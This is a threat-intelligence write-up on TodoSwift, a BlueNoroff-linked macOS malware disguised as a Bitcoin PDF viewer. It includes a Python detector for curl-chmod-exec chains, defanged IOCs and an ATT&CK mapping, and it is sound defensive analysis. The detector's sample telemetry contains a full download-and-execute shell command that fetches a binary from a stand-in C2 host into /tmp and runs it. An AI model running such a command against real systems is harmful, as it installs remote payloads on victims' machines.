TodoSwift Malware Disguised as Bitcoin PDF: North Korea’s BlueNoroff Threat Actor Group Strikes Again
On August 16, 2024, Kandji released a technical report on a new macOS malware named "TodoSwift," believed to be connected to the North Korean threat actor group BlueNoroff.
Introduction
The application, which Kandji attributes to the notorious BlueNoroff group, disguises itself as a harmless PDF viewer while it downloads and executes a second-stage payload in the background.
Report Overview
TodoSwift shares characteristics with earlier BlueNoroff-related malware, such as KandyKorn and RustBucket, making it a significant risk for macOS users, especially those involved in cryptocurrency.
BlueNoroff, a subgroup of the Lazarus Group, is infamous for financially motivated attacks that often target cryptocurrency entities. TodoSwift is the latest tool in its arsenal: the group relies on social engineering to lure victims into downloading a seemingly legitimate application that covertly installs malware on their systems.
TodoSwift operates through a GUI application written in Swift/SwiftUI. It presents itself as a PDF viewer for a document titled "Bitcoin Price Prediction Using Machine Learning." Upon launching, the application displays the PDF to the user while downloading and executing a malicious binary.
The malicious activity starts in the makeWindowControllers method: alongside setting up the application's window controller, it kicks off downloads from two URLs. These URLs, one hosted on Google Drive and one on the suspicious domain buy2x[.]com, are central to the malware's operation.
The first URL is a Google Drive link to the decoy PDF; the second points at the command-and-control (C2) server. The malware builds its commands as Swift strings and runs them through NSTask objects, executing a series of curl commands: first to download the PDF, then to fetch a stage 2 binary from the C2 server.
Once the stage 2 binary has been written to the /tmp directory, the malware marks it executable with chmod and launches it. This second-stage payload establishes a persistent connection to the C2 server, giving the threat actor the ability to execute arbitrary commands on the infected system.
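The download-and-execute chain described above (a GUI application running curl to drop a binary in /tmp, chmod'ing it executable, then launching it) is exactly the kind of sequence that process telemetry can catch regardless of which URL or hash the sample uses. The following detector is an added example, not code from Kandji's report or from the malware itself: it consumes a constructed list of process-exec events (the ProcEvent schema, the bundle name PDFViewer.app, the pids and the URL c2.invalid are all assumptions), walks each event's ancestry back to the .app bundle that spawned it, and flags any staging path in /tmp that the same app downloaded, made executable, and then executed.

```python
"""Detect a TodoSwift-style download-and-execute chain in process telemetry.

Added example, not code from Kandji's report. Models the behaviour the
report describes (a GUI app running curl to stage a binary in /tmp, making
it executable with chmod and launching it) as a sequence of process-exec
events. The event schema, bundle name, pids and URLs are constructed.
"""
import os
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str                              # resolved executable path
    args: list = field(default_factory=list)


STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")
_OCTAL = re.compile(r"0?[0-7]{3,4}")


def app_ancestor(pid, by_pid):
    """Walk parent links until we hit a process whose executable lives inside
    an .app bundle. This tolerates an intermediate /bin/sh -c spawned by
    NSTask/Process, so the shell does not hide the responsible application."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        ev = by_pid[pid]
        if ".app/Contents/MacOS/" in ev.exe:
            return ev
        pid = ev.ppid
    return None


def curl_output_path(args):
    """Return the destination path given to curl via -o/--output, else None."""
    for i, a in enumerate(args):
        if a in ("-o", "--output") and i + 1 < len(args):
            return args[i + 1]
        if a.startswith("--output="):
            return a.split("=", 1)[1]
    return None


def chmod_makes_executable(args):
    """If this chmod invocation adds an execute bit, return the target path."""
    if len(args) < 3:
        return None
    mode, path = args[-2], args[-1]
    if "x" in mode:                       # +x, u+x, a+rx ...
        return path
    if _OCTAL.fullmatch(mode) and any(int(d) & 1 for d in mode[-3:]):
        return path                       # 755, 0700, 777 ...
    return None


def detect_download_exec_chains(events):
    """Return one finding per (app, path) that was curl'ed into a staging
    directory, chmod'ed executable and then executed under the same app."""
    by_pid = {e.pid: e for e in events}
    staged = {}                           # (app pid, path) -> {"chmod": bool, "url": str}
    findings = []
    for ev in events:
        app = app_ancestor(ev.ppid, by_pid)
        if app is None:                   # not spawned (directly or via sh) by a GUI app
            continue
        name = os.path.basename(ev.exe)
        if name == "curl":
            dest = curl_output_path(ev.args)
            if dest and dest.startswith(STAGING_DIRS):
                url = next((a for a in ev.args if "://" in a), "?")
                staged[(app.pid, dest)] = {"chmod": False, "url": url}
        elif name == "chmod":
            dest = chmod_makes_executable(ev.args)
            if (app.pid, dest) in staged:
                staged[(app.pid, dest)]["chmod"] = True
        elif (app.pid, ev.exe) in staged and staged[(app.pid, ev.exe)]["chmod"]:
            findings.append({"app": app.exe, "app_pid": app.pid,
                             "payload": ev.exe, "url": staged[(app.pid, ev.exe)]["url"]})
    return findings


# Constructed sample telemetry (not real events). The first block mimics the
# TodoSwift chain via an NSTask-spawned shell; the second is a user in
# Terminal fetching a tarball into /tmp without ever executing it.
SAMPLE_EVENTS = [
    ProcEvent(500, 1, "/Users/victim/Downloads/PDFViewer.app/Contents/MacOS/PDFViewer", ["PDFViewer"]),
    ProcEvent(501, 500, "/bin/sh", ["sh", "-c",
              "curl -s -L -o /tmp/.update http://c2.invalid/s2 && chmod +x /tmp/.update && /tmp/.update"]),
    ProcEvent(502, 501, "/usr/bin/curl", ["curl", "-s", "-L", "-o", "/tmp/.update", "http://c2.invalid/s2"]),
    ProcEvent(503, 501, "/bin/chmod", ["chmod", "+x", "/tmp/.update"]),
    ProcEvent(504, 501, "/tmp/.update", ["/tmp/.update"]),
    ProcEvent(600, 1, "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", ["Terminal"]),
    ProcEvent(601, 600, "/bin/zsh", ["zsh"]),
    ProcEvent(602, 601, "/usr/bin/curl", ["curl", "-o", "/tmp/pkg.tgz", "https://example.invalid/pkg.tgz"]),
]

if __name__ == "__main__":
    for f in detect_download_exec_chains(SAMPLE_EVENTS):
        print(f"ALERT {f['app']} (pid {f['app_pid']}) staged and ran {f['payload']} from {f['url']}")
```

Keying on the nearest .app ancestor rather than the immediate parent is the important design choice: whether the sample calls curl directly from NSTask or through /bin/sh -c, the chain still resolves to the same bundle, and a Terminal user who merely downloads into /tmp produces no finding because the chmod and exec steps never occur.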
Insights and Analysis
The TodoSwift malware represents a serious threat to macOS users, particularly those involved in cryptocurrency. Its use of social engineering, combined with a multi-stage download-and-execute chain, makes it effective at compromising systems. The fact that the malware is signed with a legitimate developer ID further complicates detection and mitigation: Gatekeeper will allow a Developer ID-signed application to run, so the signature tells the user nothing about intent, and only a certificate revocation by Apple turns that trust off after the fact. The broader implications of this attack include financial losses, data breaches, and long-term persistence on affected systems.
To protect against TodoSwift and similar threats, users should avoid downloading applications from untrusted sources, even if they appear to be signed with a legitimate certificate. Administrators can inspect a bundle's signing identity and Gatekeeper assessment with codesign and spctl, but a clean result is not proof of safety. Keeping security software and the operating system up to date is crucial against new and emerging threats, and users should treat any application that requests access to sensitive data or performs unexpected actions (such as a PDF viewer making network connections and spawning processes) with suspicion.
TodoSwift is a sophisticated piece of malware that leverages social engineering and advanced technical methods to compromise macOS systems. Its ties to the BlueNoroff threat actor group underscore the ongoing risks posed by state-sponsored cyber operations. Vigilance and robust security practices are essential in mitigating the impact of such threats.
Indicators of Compromise (IOCs):
| Indicator | Type | Description |
|---|---|---|
| f1b3ce96462027644f9caa314d3da745dab139ee1cb14fe508234e76bd686f93 | SHA-256 Hash | Hash of the analyzed Mach-O binary. |
| hxxps[:]//drive[.]usercontent.google[.]com/download?id=1xflBpAVQrwIS3UQqynb8iEj6gaCIXczo | URL | Google Drive link used to download the Bitcoin-related decoy PDF. |
| hxxp[:]//buy2x[.]com/OcMySY5QNkY/ABcTDInKWw/4SqSYtx%2B/EKfP7saoiP/BcA%3D%3D | URL | Command-and-control (C2) server URL used for the stage 2 malware download. |
MITRE ATT&CK Mapping:
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Execution | Command and Scripting Interpreter: Unix Shell | T1059.004 | The malware runs curl commands via NSTask objects to download and execute payloads on the system. |
| Defense Evasion | Subvert Trust Controls: Code Signing | T1553.002 | The application is signed with a legitimate developer ID, allowing it to pass Gatekeeper and other signature-based controls. |
| Persistence | Boot or Logon Autostart Execution | T1547 | The malware executes a stage 2 binary that may be configured to run at startup; the report does not detail the persistence mechanism. |
| Discovery | System Information Discovery | T1082 | The malware gathers system information to determine whether it is running on a targeted macOS system. |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | The malware communicates with the C2 server over HTTP(S), blending in with ordinary web traffic. |